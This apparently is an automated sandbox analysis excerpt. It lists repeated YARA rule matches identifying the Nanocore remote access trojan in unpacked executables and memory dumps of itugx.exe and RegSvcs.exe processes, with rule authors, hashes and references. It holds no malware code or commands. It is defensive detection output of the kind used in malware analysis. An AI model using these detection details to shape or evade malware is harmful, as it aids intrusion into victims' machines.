      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
